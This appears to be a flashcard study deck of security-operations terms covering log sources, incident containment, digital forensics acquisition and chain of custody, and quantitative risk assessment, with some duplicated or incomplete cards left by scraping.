Authentication attempts for each host are likely to be written to the security log. You might also need to inspect logs from the servers authorizing logons, such as RADIUS and TACACS+ servers or Windows Active Directory (AD) servers.

Term

Vulnerability Scan Output 

Definition

A vulnerability scan report is another important source when determining how an attack might have been made. The scan engine might log or alert when a scan report contains vulnerabilities. The report can be analyzed to identify vulnerabilities that have not been patched or configuration weaknesses that have not been remediated. These can be correlated to recently developed exploits.

Term
System and Security Logs
Definition
Term

System and Security Logs 

Definition
One source of security information is the event log from each network server or client. Systems such as Microsoft Windows, Apple macOS, and Linux keep a variety of logs to record events as users and software interact with the system. The format of the logs varies depending on the system. Information contained within the logs also varies by system, and in many cases, the type of information that is captured can be configured.
Term
APPLICATION LOG
Definition

An application log file is simply one that is managed by the application rather than the OS. The application may use Event Viewer or syslog to write event data using a standard format, or it might write log files to its own application directories in whatever format the developer has selected.

 

Term

DNS Event Logs 

Definition

A DNS server may log an event each time it handles a request to convert between a domain name and an IP address. DNS event logs can hold a variety of information that may supply useful security intelligence, such as:

  • The types of queries a host has made to DNS.
  • Hosts that are in communication with suspicious IP address ranges or domains.
  • Statistical anomalies such as spikes or consistently large numbers of DNS lookup failures, which may point to computers that are infected with malware, misconfigured, or running obsolete or faulty applications.
Term

 

Web/HTTP Access Logs 

Definition

Web servers are typically configured to log HTTP traffic that encounters an error or traffic that matches some predefined rule set. Most web servers use the common log format (CLF) or W3C extended log file format to record the relevant information.

The status code of a response can reveal quite a bit about both the request and the server's behavior. Codes in the 400 range indicate client-based errors, while codes in the 500 range indicate server-based errors. For example, repeated 403 ("Forbidden") responses may indicate that the server is rejecting a client's attempts to access resources they are not authorized to. A 502 ("Bad Gateway") response could indicate that communications between the target server and its upstream server are being blocked, or that the upstream server is down.

 

In addition to status codes, some web server software also logs HTTP header information for both requests and responses. This can provide you with a better picture of the makeup of each request or response, such as cookie information and MIME types. Another header field of note is the User-Agent field, which identifies the type of application making the request. In most cases, this is the version of the browser that the client is using to access a site, as well as the client's operating system. However, this can be misleading, as even a browser like Microsoft Edge includes versions of Google Chrome and Safari in its User-Agent string. Therefore, the User-Agent field may not be a reliable indicator of the client's environment.

Term

VoIP and Call Managers and Session Initiation Protocol (SIP) Traffic

Definition

Many VoIP systems use the Session Initiation Protocol (SIP) to identify endpoints and setup calls. The call content is transferred using a separate protocol, typically the Real-time Transport Protocol (RTP). VoIP protocols are vulnerable to most of the same vulnerabilities and exploits as web communications. Both SIP and RTP should use the secure protocol forms, where endpoints are authenticated and communications protected by Transport Layer Security (TLS).

 

The call manager is a gateway that connects endpoints within the local network and over the Internet. The call manager is also likely to implement a media gateway to connect VoIP calls to cellphone and landline telephone networks. SIP produces similar logs to SMTP, typically in the common log format. A SIP log will identify the endpoints involved in a call request, plus the type of connection (voice only or voice with video, for instance), and status messaging. When handling requests, the call manager and any other intermediate servers add their IP address in a Via header, similar to per-hop SMTP headers. Inspecting the logs might reveal evidence of a man-in-the-middle attack where an unauthorized proxy is intercepting traffic. VoIP systems connected to telephone networks are also targets for toll fraud. The call manager's access log can be audited for suspicious connections.

Term

Dump Files

Definition

File containing data captured from system memory.

System memory contains volatile data. A system memory dump

×
 

File containing data captured from system memory.

 creates an image file that can be analyzed to identify the processes that are running, the contents of temporary file systems, registry data, network connections, cryptographic keys, and more. It can also be a means of accessing data that is encrypted when stored on a mass storage device. 

 

Term
Metadata 
Definition

Information stored or recorded as a property of an object, state of a system, or transaction.

Metadata is the properties of data as it is created by an application, stored on media, or transmitted over a network. A number of metadata sources are likely to be useful when investigating incidents, because they can establish timeline questions, such as when and where, as well as containing other types of evidence. 

 

Term

File

Definition

File metadata is stored as attributes. The file system tracks when a file was created, accessed, and modified. A file might be assigned a security attribute, such as marking it as read-only or as a hidden or system file. The ACL attached to a file showing its permissions represents another type of attribute. Finally, the file may have extended attributes recording an author, copyright information, or tags for indexing/searching. In Linux, the ls command can be used to report file system metadata. 

 

Term

Web

Definition

When a client requests a resource from a web server, the server returns the resource plus headers setting or describing its properties. Also, the client can include headers in its request. One key use of headers is to transmit authorization information, in the form of cookies. Headers describing the type of data returned (text or binary, for instance) can also be of interest. The contents of headers can be inspected using the standard tools built into web browsers. Header information may also be logged by a web server. 

Term
Internet header
Definition

A record of the email servers involved in transferring an email message from a sender to a recipient.

An email's Internet header contains address information for the recipient and sender, plus details of the servers handling transmission of the message between them.

 

Term

Email
(METADATA)

Definition

An email's Internet header contains address information for the recipient and sender, plus details of the servers handling transmission of the message between them. When an email is created, the mail user agent (MUA) creates an initial header and forwards the message to a mail delivery agent (MDA). The MDA should perform checks that the sender is authorized to issue messages from the domain. Assuming the email isn't being delivered locally at the same domain, the MDA adds or amends its own header and then transmits the message to a message transfer agent (MTA). The MTA routes the message to the recipient, with the message passing via one or more additional MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA adds information to the header.

 


Headers aren't exposed to the user by most email applications, which is why they're usually not a factor in an average user's judgment. You can view and copy headers from a mail client via a message properties/options/source command. MTAs can add a lot of information in each received header, such as the results of spam checking. If you use a plaintext editor to view the header, it can be difficult to identify where each part begins and ends. Fortunately, there are plenty of tools available to parse headers and display them in a more structured format. One example is the
Message Analyzer tool, available as part of the Microsoft Remote Connectivity Analyzer This will lay out the hops that the message took more clearly and break out the headers added by each MTA. 

Term

Mobile
(METADATA)

Definition

Mobile phone metadata comprises call detail records (CDRs) of incoming, outgoing, and attempted calls and SMS text time, duration, and the opposite party's number. Metadata will also record data transfer volumes. The location history of the device can be tracked by the list of cell towers it has used to connect to the network. If you are investigating a suspected insider attack, this metadata could prove a suspect's whereabouts. Furthermore, AI-enabled analysis (or patient investigation) can correlate the opposite party numbers to businesses and individuals through other public records.

 

CDRs are generated and stored by the mobile operator. The retention period for CDRs is determined by national and state laws, but is typically around 18 months. CDRs are directly available for corporate-owned devices, where you can request them from the communications provider as the owner of the device. Metadata for personally owned devices would only normally be accessible by law enforcement agencies by subpoena or with the consent of the account holder. An employment contract might require an employee to give this consent for bring your own device (BYOD) mobiles used within the workplace.

Term

Protocol Analyzer Output 

Definition

A SIEM will store details from sensors at different points on the network. Information captured from network packets can be aggregated and summarized to show overall protocol usage and endpoint activity. The contents of packets can also be recorded for analysis. Recording the full data of every packet—referred to as retrospective network analysis (RNA)—is too costly for most organizations. Typically, packet contents are only retained when indicators from the traffic are correlated as an event. The SIEM software will provide the ability to pivot from the event or alert summary to the underlying packets. Detailed analysis of the packet contents can help to reveal the tools used in an attack. It is also possible to extract binary files such as potential malware for analysis.

Term
NetFlow 
Definition

A Cisco-developed means of reporting network flow information to a structured database. NetFlow allows better understanding of IP traffic flows as used by different network applications and hosts.

 

Term
IP Flow Information Export (IPFIX) 
Definition

Standards-based version of the Netflow framework.


NetFlow has been redeveloped as the IP Flow Information Export (IPFIX) 

Term
sFlow,
Definition

Web standard for using sampling to record network traffic statistics.

sFlow, developed by HP and subsequently adopted as a web standard  uses sampling to measure traffic statistics at any layer of the OSI model for a wider range of protocol types than the IP-based Netflow. sFlow can also capture the entire packet header for samples. 

 

Term

Bandwidth Monitor 

Definition

Bandwidth usage can be a key indicator of suspicious behavior, if you have reliable baselines for comparison. Unexpected bandwidth consumption could be evidence of a data exfiltration attack, for instance. Bandwidth usage can be reported by flow collectors. Firewalls and web security gateways are also likely to support bandwidth monitoring and alerting.

Term

Isolation-Based Containment  

Definition

Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, to placing an application in a sandbox VM outside of the host environments it usually runs on. Whatever the circumstances may be, you'll want to make sure that there is no longer an interface between the affected component and your production network or the Internet.

A simple option is to disconnect the host from the network completely, either by pulling the network plug (creating an air gap) or disabling its switch port. This is the least stealthy option and will reduce opportunities to analyze the attack or malware. If a group of hosts is affected, you could use routing infrastructure to isolate one or more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest of the network. Another possibility is to use firewalls or other security filters to prevent infected hosts from communicating.

Finally, isolation could also refer to disabling a user account or application service. Temporarily disabling users' network accounts may prove helpful in containing damage if an intruder is detected within the network. Without privileges to access resources, an intruder will not be able to further damage or steal information from the organization. Applications that you suspect may be the vector of an attack can be much less effective to the attacker if the application is prevented from executing on most hosts.

Term

Segmentation-Based Containment 

Definition

Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. As opposed to completely isolating the hosts, you might configure the protected segment as a sinkhole or honeynet and allow the attacker to continue to receive filtered (and possibly modified) output over the C&C channel to deceive him or her into thinking the attack is progressing successfully. 

Term

INCIDENT ERADICATION AND RECOVERY 

Definition

1.    Reconstitution of affected systems—either remove the malicious files or tools from affected systems or restore the systems from secure backups/images.

2.    Reaudit security controls—ensure they are not vulnerable to another attack. This could be the same attack or from some new attack that the attacker could launch through information they have gained about your network.

 

3.    Ensure that affected parties are notified and provided with the means to remediate their own systems. For example, if customers' passwords are stolen, they should be advised to change the credentials for any other accounts where that password might have been used (not good practice, but most people do it). 

Term

 

FIREWALL CONFIGURATION CHANGES

Definition

§  Allow only authorized application ports and, if possible, restrict the destination addresses to authorized Internet hosts. Where authorized hosts cannot be identified or a default deny is too restrictive, use URL and content filtering to try to detect malicious traffic over authorized protocols.

§  Restrict DNS lookups to your own or your ISP's DNS services or authorized public resolvers, such as Google's or Quad9's DNS services.

§  Block access to "known bad" IP address ranges, as listed on don't route or peer (DROP) filter lists.

§  Block access from any IP address space that is not authorized for use on your local network.

 

§  Block all Internet access from host subnets that do not need to connect to the Internet, such as most types of internal server, workstations used to manage industrial control systems (ICSs), and so on.

Term

 

Data Loss Prevention (DLP) 

Definition

Data loss prevention (DLP) performs a similar function, but instead of user access it mediates the copying of tagged data to restrict it to authorized media and services. An attack may reveal the necessity of investing in DLP as a security control if one is not already implemented. If DLP is enabled and configured in the correct way to enforce policy, the attacker may have been able to circumvent it using a backdoor method that the DLP software cannot scan. Alternatively, the attacker may have been able to disguise the data so that it was not recognized.

Term

Mobile Device Management (MDM)  

Definition

Mobile Device Management (MDM) provides execution control over apps and features of smartphones. Features include GPS, camera, and microphone. As with DLP, an intrusion might reveal a vector that allowed the threat actor to circumvent enrollment or a misconfiguration in the MDM's policy templates. 

 

Term

Mobile Device Management (MDM)  

Definition

Mobile Device Management (MDM) provides execution control over apps and features of smartphones. Features include GPS, camera, and microphone. As with DLP, an intrusion might reveal a vector that allowed the threat actor to circumvent enrollment or a misconfiguration in the MDM's policy templates. 

 

Term

Update or Revoke Certificates 

Definition

Compromise of the private key represented by a digital certificate or the ability to present spoofed certificates as trusted is a critical security vulnerability as it allows an attacker to impersonate trusted resources and potentially gain unauthorized access to secure systems.

  • Remove compromised root certificates—if an attacker has managed to install a root certificate, the attacker can make malicious hosts and services seem trusted. Suspicious root certificates must be removed from the client's cache.
  • Revoke certificates on compromised hosts—if a host is compromised, the private key it used for digital signatures or digital envelopes is no longer safe. The certificate associated with the key should be revoked using the Key Compromise property. The certificate can be rekeyed with a new key pair but the same subject and expiry information.
Term
ENDPOINT CONFIGURATION CHANGES
Definition
  • Social engineering—if the malware was executed by a user, use security education and awareness to reduce the risk of future attacks succeeding. Review permissions to see if the account could be operated with a lower privilege level.
  • Vulnerabilities—if the malware exploited a software fault, either install the patch or isolate the system until a patch can be developed.
  • Lack of security controls—if the attack could have been prevented by endpoint protection/A-V, host firewall, content filtering, DLP, or MDM, investigate the possibility of deploying them to the endpoint. If this is not practical, isolate the system from being exploited by the same vector.
  • Configuration drift—if the malware exploited an undocumented configuration change (shadow IT software or an unauthorized service/port, for instance), reapply the baseline configuration and investigate configuration management procedures to prevent this type of ad hoc change.
  • Weak configuration—if the configuration was correctly applied, but was exploited anyway, review the template to devise more secure settings. Make sure the template is applied to similar hosts. 
Term

Application Allow Lists and Block Lists

Definition

One element of endpoint configuration is an execution control policy that defines applications that can or cannot be run.

§  An allow list (or approved list) denies execution unless the process is explicitly authorized.

§  A block list (or deny list) generally allows execution, but explicitly prohibits listed processes.

 

You will need to update the contents of allow lists and block lists in response to incidents and as a result of ongoing threat hunting and monitoring. Threat hunting may also provoke a strategic change. For example, if you rely principally on explicit denies, but your systems are subject to numerous intrusions, you will have to consider adopting a "least privileges" model and using a deny-unless-listed approach. This sort of change has the potential to be highly disruptive however, so it must be preceded by a risk assessment and business impact analysis.

Term

Quarantine

Definition

The process of isolating a file, computer system, or computer network to prevent the spread of a virus or another cybersecurity incident.


If mitigating techniques are not successful, or the results are uncertain, the endpoint will require careful management before being integrated back onto the network. If further evidence needs to be gathered, the best approach may be to quarantine or sandbox the endpoint or suspect process/file. This allows for analysis of the attack or tool and collection of evidence using digital forensic techniques.

Term
Automation is the action of scripting a single activity, while orchestration is the action of coordinating multiple automations (and possibly manual activity) to perform a complex, multistep task.
Definition
Term
 security orchestration, automation, and response (SOAR)
Definition

A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment.

The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting. It can also assist with provisioning tasks, such as creating and deleting user accounts, making shares available, or launching VMs from templates, to try to eliminate configuration errors. The SOAR will use technologies such as cloud and Software-Defined Networking (SDN)/Software-Defined Visibility (SDV) APIs, orchestration tools, and cyberthreat intelligence (CTI) feeds to integrate the different systems that it is managing. It will also leverage technologies such as automated malware signature creation and user and entity behavior analytics (UEBA) to detect threats.

 

Term
runbook
Definition

An automated version of a playbook that leaves clearly defined interaction points for human analysis.

Where a playbook is implemented with a high degree of automation from a SOAR system, it can be referred to as a runbook, though the terms are also widely used interchangeably. The aim of a runbook is to automate as many stages of the playbook as possible, leaving clearly defined interaction points for human analysis. These interaction points should try to present all the contextual information and guidance needed for the analyst to make a quick, informed decision about the best way to proceed with incident mitigation.

 

Term
adversarial AI.  
Definition

Using AI to identify vulnerabilities and attack vectors to circumvent security systems.

 

Term
Digital forensics  
Definition

The process of gathering and submitting computer evidence to trial. Digital evidence is latent, meaning that it must be interpreted. This means that great care must be taken to prove that the evidence has not been tampered with or falsified.

 

Term

Evidence, Documentation, and Admissibility

 

Definition

Like DNA or fingerprints, digital evidence is latent. Latent means that the evidence cannot be seen with the naked eye; rather, it must be interpreted using a machine or process. This means that great care must be taken to ensure the admissibility of digital evidence. As well as the physical evidence (a hard drive, for instance), digital forensics requires documentation showing how the evidence was collected and analyzed without tampering or bias.

Term

Legal Hold 

Definition

Legal hold refers to the fact that information that may be relevant to a court case must be preserved. Information subject to legal hold might be defined by regulators or industry best practice, or there may be a litigation notice from law enforcement or lawyers pursuing a civil action. This means that computer systems may be taken as evidence, with all the obvious disruption to a network that entails. 

Term
Chain of custody 
Definition

The record of evidence history from collection, to presentation in court, to disposal.

Chain of custody documentation reinforces the integrity and proper handling of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been tampered with or is different than it was when it was collected. Every person in the chain who handles evidence must log the methods and tools they used.

 

Term

 E-discovery 

Some of the functions of e-discovery suites are:

Definition

Procedures and tools to collect, preserve, and analyze digital evidence.

E-discovery is a means of filtering the relevant evidence produced from all the data gathered by a forensic examination and storing it in a database in a format such that it can be used as evidence in a trial.

§  Identify and deduplicate files and metadatamany files on a computer system are "standard" installed files or copies of the same file. E-discovery filters these types of files, reducing the volume of data that must be analyzed.

§  Searchallow investigators to locate files of interest to the case. As well as keyword search, software might support semantic search. Semantic search matches keywords if they correspond to a particular context.

§  Tagsapply standardized keywords or labels to files and metadata to help organize the evidence. Tags might be used to indicate relevancy to the case or part of the case or to show confidentiality, for instance.

§  Securityat all points evidence must be shown to have been stored, transmitted, and analyzed without tampering.

 

§  Disclosurean important part of trial procedure is that the same evidence be made available to both plaintiff and defendant. E-discovery can fulfill this requirement. Recent court cases have required parties to a court case to provide searchable ESI rather than paper records. 

 

Term

VIDEO AND WITNESS INTERVIEWS

Definition

The first phase of a forensics investigation is to document the scene. The crime scene must be recorded using photographs and ideally audio and video. Investigators must capture every action they take in identifying, collecting, and handling evidence.

If possible, evidence is gathered from the live system using forensic software tools. It is vital that these tools do as little to modify the digital data that they capture as possible.

As well as digital evidence, an investigator should interview witnesses to establish what they were doing at the scene, whether they observed any suspicious behavior or activity, and also to gather information about the computer system. An investigator might ask questions informally and record the answers as notes to gain an initial understanding of the circumstances surrounding an incident. An investigator must ask questions carefully, to ensure that the witness is giving reliable information and to avoid leading the witness to a particular conclusion. Making an audio or video recording of witness statements produces a more reliable record but may make witnesses less willing to make a statement. If a witness needs to be compelled to make a statement, there will be legal issues around employment contracts (if the witness is an employee) and right to legal representation.

Term

TIMELINES 

Definition

A significant part of a forensic investigation will involve tying events to specific times to establish a consistent and verifiable narrative. The visual representation of events happening in chronological order is called a timeline.

Term
time offset 
Definition

In forensics, identifying whether a time zone offset has been applied to a file's time stamp.



When collecting evidence, it is vital to establish how a time stamp is calculated and note the offset between the local system time and UTC

). The local time offset may also vary if a seasonal daylight saving time is in place.

.

Term
EVENT LOGS AND NETWORK TRAFFIC
Definition

An investigation may also obtain the event logs for one or more network appliances and/or server hosts. Similarly, network packet captures and traces/flows might provide valuable evidence

A Retrospective Network Analysis (RNA) solution provides the means to record network events at either a packet header or payload level.

. For event logs, the drives might not be accessible or might no longer hold the original logs; for network traffic, there is no physical evidence. Where logs and network traffic are captured in a SIEM, the SIEM should demonstrate accuracy (that all relevant data was captured) and integrity (that neither party could have tampered with the data).

Term
 COUNTERINTELLIGENCE
Definition
identification and analysis of specific adversary tactics, techniques, and procedures (TTP) provides information about how to configure and audit active logging systems so that they are most likely to capture evidence of attempted and successful intrusions.
Term
STRATEGIC INTELLIGENCE 
Definition

§  data and research that has been analyzed to produce actionable insights. These insights are used to inform risk management and security control provisioning to build mature cybersecurity capabilities.

Term
Acquisition 
Definition

Computer forensics procedures and tools for collecting and validating digital evidence.

Acquisition is the process of obtaining a forensically clean copy of data from a device held as evidence. If the computer system or device is not owned by the organization, there is the question of whether search or seizure is legally valid. 

 

Term
Data acquisition 
Definition

In digital forensics, the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk.

 

Term
order of volatility,
Definition

The order in which volatile data should be recovered from various storage locations and devices after a security incident occurs.

he general principle is to capture evidence in the order of volatility, from more volatile to less volatile.

 

Term
order of volatility,
Definition

1.    CPU registers and cache memory (including cache on disk controllers, GPUs, and so on).

2.    Contents of nonpersistent system memory (RAM), including routing table, ARP cache, process table, kernel statistics.

3.    Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices):

·         Partition and file system blocks, slack space, and free space.

·         System memory caches, such as swap space/virtual memory and hibernation files.

·         Temporary file caches, such as the browser cache.

·         User, application, and OS files and directories.

4.            Remote logging and monitoring data.

5.            Physical configuration and network topology.

 

6.            Archival media and printed documents.

Term
Forensic Toolkit (FTK)
Definition

A commercial digital forensics investigation management and utilities suite, published by AccessData.

 

  • The Forensic Toolkit (FTK) from AccessData is another commercial investigation suite designed to run on Windows Server (or server cluster).
Term
The Sleuth Kit ( 
Definition

The Sleuth Kit is an open source collection of command-line and programming libraries for disk imaging and file analysis. Autopsy is a graphical front-end for these tools and also provides a case management/workflow tool.The program can be extended with plug-ins for various analysis functions. Autopsy is available for Windows and Linux systems.

 

Term

SYSTEM MEMORY ACQUISITION 

Definition

System memory is volatile data held in Random Access Memory (RAM) modules. Volatile means that the data is lost when power is removed. A system memory dump creates an image file that can be analyzed to identify the processes that are running, the contents of temporary file systems, registry data, network connections, cryptographic keys, and more. It can also be a means of accessing data that is encrypted when stored on a mass storage device. There are various methods of collecting the contents of system memory.

Term
memdump 

dd
Definition
  1. Linux utility developed as part of the Coroner's Toolkit to dump system memory data to a file.

  2. dd, can be run against the /dev/mem device file. However, on most modern distributions, access to this file is blocked. 

 

Term

Crash Dump 

Definition

When Windows encounters an unrecoverable kernel error, it can write contents of memory to a dump file at C:\Windows\MEMORY.DMP. On modern systems, there is unlikely to be a complete dump of all the contents of memory, as these could take up a lot of disk space. However, even mini dump files, stored in C:\Windows\Minidumps, may be a valuable source of information.

Term
anti-forensics
Definition

The process by which an attacker impedes a forensic investigation.

 

Term

Pagefile 

Definition
The pagefile/swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. The pagefile is not structured in a way that analysis tools can interpret, but it is possible to search for strings.
Term

Hibernation File 

Definition

A hibernation file is created on disk in the root folder of the boot volume when a Windows host is put into a sleep state. If it can be recovered, the data can be decompressed and loaded into a software tool for analysis. The drawback is that network connections will have been closed, and malware may have detected the use of a sleep state and performed anti-forensics.

 

Term
Live acquisition
Definition
this means copying the data while the host is still running. This may capture more evidence or more data for analysis and reduce the impact on overall services, but the data on the actual disks will have changed, so this method may not produce legally acceptable evidence. It may also alert the adversary and allow time for them to perform anti-forensics.
Term
Static acquisition by shutting down the host
Definition
by shutting down the host—this runs the risk that the malware will detect the shutdown process and perform anti-forensics to try to remove traces of itself.
Term
Static acquisition by pulling the plug
Definition

§  this means disconnecting the power at the wall socket (not the hardware power-off button). This is most likely to preserve the storage devices in a forensically clean state, but there is the risk of corrupting data.

Term
dd command  

Linux 
Definition

Linux command that makes a bit-by-bit copy of an input file, typically used for disk imaging.

If no specialized tool is available, on a Linux host you can use the dd command to make a copy of an input file (if=) to an output file (of=) and apply optional conversions to the file data. In the following sda is the fixed drive:

dd if=/dev/sda of=/mnt/usbstick/backup.img

 

A more recent fork of dd is dcfldd, which provides additional features like multiple output files and exact match verification.

 

Term
provenance
Definition

In digital forensics, being able to trace the source of evidence to a crime scene and show that it has not been tampered with.

 

Term
write blocker 
Definition

Forensic tool to prevent the capture or analysis device or workstation from changing data on a target disk or media.

. A write blocker assures this process by preventing any data on the disk or volume from being changed by filtering write commands at the driver and OS level. Data acquisition would normally proceed by attaching the target device to a forensics workstation or field capture device equipped with a write blocker.

 

Term
Data Acquisition with Integrity and Non-Repudiation
Definition

Once the target disk has been safely attached to the forensics workstation, data acquisition proceeds as follows:

1.    A cryptographic hash of the disk media is made, using either the MD5 or SHA hashing function. The output of the function can be described as a checksum.

2.    A bit-by-bit copy of the media is made using the imaging utility.

3.    A second hash is then made of the image, which should match the original hash of the media.

4.    A copy is made of the reference image, validated again by the checksum. Analysis is performed on the copy.

 

This proof of integrity ensures non-repudiation. If the provenance of the evidence is certain, the threat actor identified by analysis of the evidence cannot deny their actions. The checksums prove that no modification has been made to the image.

Term

Preservation of Evidence 

Definition

The host devices and media taken from the crime scene should be labeled, bagged, and sealed, using tamper-evident bags. It is also appropriate to ensure that the bags have antistatic shielding to reduce the possibility that data will be damaged or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of evidence should be documented by a chain of custody form which records where, when, and who collected the evidence, who subsequently handled it, and where it was stored. 

 

The evidence should be stored in a secure facility; this not only means access control, but also environmental control, so that the electronic systems are not damaged by condensation, ESD, fire, and other hazards. Similarly, if the evidence is transported, the transport must also be secure.

Term

Network 

Definition

Packet captures and traffic flows can contain very valuable evidence, if the capture was running at the right time and in the right place to record the incident. As with memory forensics, the issue for forensics lies in establishing the integrity of the data. Most network data will come from a SIEM.

Term

Cache 

Definition

Cache can refer either to hardware components or software. Software-based cache is stored in the file system and can be acquired as part of a disk image. For example, each browser has a cache of temporary files, and each user profile has a cache of temp files. Some cache artifacts generated by the OS and applications are held in memory only, such as portions of the registry, cryptographic keys, password hashes, some types of cookies, and so on. The contents of hardware cache (CPU registers and disk controller read/write cache, for instance) is not generally recoverable.

Term

Artifacts and Data Recovery 

Definition

Artifacts refers to any type of data that is not part of the mainstream data structures of an operating system. For example, the Windows Alternate Data Streams (ADS) feature is often used to conceal file data, and various caches, such as prefetch and Amcache, can be used to find indicators of suspicious process behavior.

 

Data recovery refers to analyzing a disk (or image of a disk) for file fragments stored in slack space. These fragments might represent deleted or overwritten files. The process of recovering them is referred to as carving

Term
Alternate Data Streams (ADS) 
Definition

A function of the NT File System (NTFS) that enables multiple data streams for a single file name.

 

Term
carving 
Definition

The process of extracting data from a computer when that data has no associated file system metadata.

Data recovery refers to analyzing a disk (or image of a disk) for file fragments stored in slack space. These fragments might represent deleted or overwritten files. The process of recovering them is referred to as carving

 

Term

Snapshot 

Definition

A snapshot is a live acquisition image of a persistent disk. While this may have less validity than an image taken from a device using a write blocker, it may be the only means of acquiring data from a virtual machine or cloud process. 

Term

Firmware 

Definition

Firmware is usually implemented as flash memory. Some types, such as the PC firmware, can potentially be extracted from the device or from system memory using an imaging utility. It likely will be necessary to use specialist hardware to attach the device to a forensic workstation, however. 

Term

DIGITAL FORENSICS FOR CLOUD

Other issues with forensics investigations of cloud-hosted processing and data services are as follows:

Definition

 The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent with extensive logging and monitoring options. A CSP might also provide an option to generate file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM.

 Chain of custody issues are complex and might have to rely on the CSP to select and package data for you. The process should be documented and recorded as closely as is possible.

 Jurisdiction and data sovereignty may restrict what evidence the CSP is willing to release to you.

 If the CSP is a data processor, it will be bound by data breach notification laws and regulations.
Coordinating the timing of notification and contact with the regulator between your organization and the CSP can be extremely complex, especially if there is an ongoing incident requiring confidentiality.

 

Term
Risk management 
Definition

The cyclical process of identifying, assessing, analyzing, and responding to risks.

Risk management is a process for identifying, assessing, and mitigating vulnerabilities and threats to the essential functions that a business must perform to serve its customers. You can think of this process as being performed over five phases:

 

1.    Identify mission-essential functions—mitigating risk can involve a large amount of expenditure so it is important to focus efforts. Effective risk management must focus on mission essential functions that could cause the whole business to fail if they are not performed. Part of this process involves identifying critical systems and assets that support these functions.

2.    Identify vulnerabilities—for each function or workflow (starting with the most critical), analyze systems and assets to discover and list any vulnerabilities or weaknesses to which they may be susceptible.

3.    Identify threats—for each function or workflow, identify the threat sources and actors that may take advantage of or exploit or accidentally trigger vulnerabilities.

4.    Analyze business impacts—the likelihood of a vulnerability being activated as a security incident by a threat and the impact of that incident on critical systems are the factors used to assess risk. There are quantitative and qualitative methods of analyzing impacts and likelihood.

5.    Identify risk response—for each risk, identify possible countermeasures and assess the cost of deploying additional security controls. Most risks require some sort of mitigation, but other types of response might be more appropriate for certain types and level of risks.

Term
Likelihood
Definition

In risk calculation, the chance of a threat being realized, expressed as a percentage.

 

 Likelihood of occurrence is the probability of the threat being realized.

Term
Impact 
Definition

Impact is the severity of the risk if realized as a security incident. This may be determined by factors such as the value of the asset or the cost of disruption if the asset is compromised.

In risk calculation, the cost of a security incident or disaster scenario.

 

 

Term
enterprise risk management (ERM) 
Definition

The comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization.

 

Risk management is complex and treated very differently in companies and institutions of different sizes, and with different regulatory and compliance requirements. Most companies will institute enterprise risk management (ERM) policies and procedures, based on frameworks such as NIST's Risk Management Framework (RMF) or ISO 31K. These legislative and framework compliance requirements are often formalized as a Risk and Control Self-Assessment (RCSA). An organization may also contract an external party to lead the process, in which case it is referred to as a Risk and Control Assessment (RCA).

Term

RISK TYPES

External

Definition

External threat actors are one highly visible source of risk. You must also consider wider threats than those of cyberattack. Natural disasters, such as the COVID-19 pandemic, illustrate the need to have IT systems and workflows that are resilient to widespread dislocation. The most critical type of impact is one that could lead to loss of life or critical injury. The most obvious risks to life and safety come from natural disasters, person-made disasters, and accidents, such as fire.

Term

RISK TYPES

Internal

Definition

Internal risks come from assets and workflows that are owned and managed by your organization. When reviewing internal risks, it is important to remember that these can be classed as malicious or accidental (non-malicious). Internal threats can include contractors who were granted temporary access.

 

Term

RISK TYPES

Multiparty

Definition

Multiparty risk is where an adverse event impacts multiple organizations. Multiparty risk usually arises from supplier relationships. If a critical event disrupts a supplier or customer, then your own organization will suffer. These are often described as ripple impacts. For example, if one of your top five customers goes out of business because of a data breach, your company will lose substantial revenue. Organizations in these supply chain relationships have an interest in promoting cybersecurity awareness and capability throughout the chain.

 

As an illustration of how risk assessments can change in view of multiparty relationship, consider a company that makes wireless adapters, originally for use with laptops. In the original usage, the security of the firmware upgrade process is important, but it has no impact on life or safety. The company, however, earns a new contract to supply the adapters to provide connectivity for in-vehicle electronics systems. Unknown to the company, a weakness in the design of the in-vehicle system allows an adversary to use compromised wireless adapter firmware to affect the car's control systems. The integrity of the upgrade process now has an impact on safety, and is much higher risk.

Term

RISK TYPES

Intellectual Property (IP) Theft

Definition

Intellectual property (IP) is data of commercial value that is owned by the organization. This can mean copyrighted material for retail (software, written work, video, and music) and product designs and patents. If IP data is exfiltrated it will lose much of its commercial value. Losses can be very difficult to recover in territories where there are not strong legal protections.

 

Term

RISK TYPES

Software Compliance/Licensing

 

Definition

Breaking the terms of the end user licensing agreement (EULA) that imposes conditions on installation of the software can expose the computer owner to substantial fines. License issues are most likely to arise from shadow IT, where users install software without change control approval. Network inventory management suites can report software installations on each host and correlate those with the number of license seats purchased. Licensing models can also be complex, especially where virtualization and the cloud are concerned. It is important to train the administrative staff on the specific license terms for each product.

 

Term

RISK TYPES

Legacy Systems

Definition

Legacy systems are a source of risk because they no longer receive security updates and because the expertise to maintain and troubleshoot them is a scarce resource.

Term

QUANTITATIVE RISK ASSESSMENT

Quantitative risk assessment aims to assign concrete values to each risk factor.

Definition
Single Loss Expectancy (SLE)
Annualized Loss Expectancy (ALE)
Term
QUANTITATIVE RISK ASSESSMENT
Single Loss Expectancy (SLE)
Definition

the amount that would be lost in a single occurrence of the risk factor. This is determined by multiplying the value of the asset by an Exposure Factor (EF). EF is the percentage of the asset value that would be lost.

 Exposure Factor (EF).

In risk calculation, the percentage of an asset's value that would be lost during a security incident or disaster scenario.

 

Term
QUANTITATIVE RISK ASSESSMENT
Annualized Loss Expectancy (ALE)
Definition

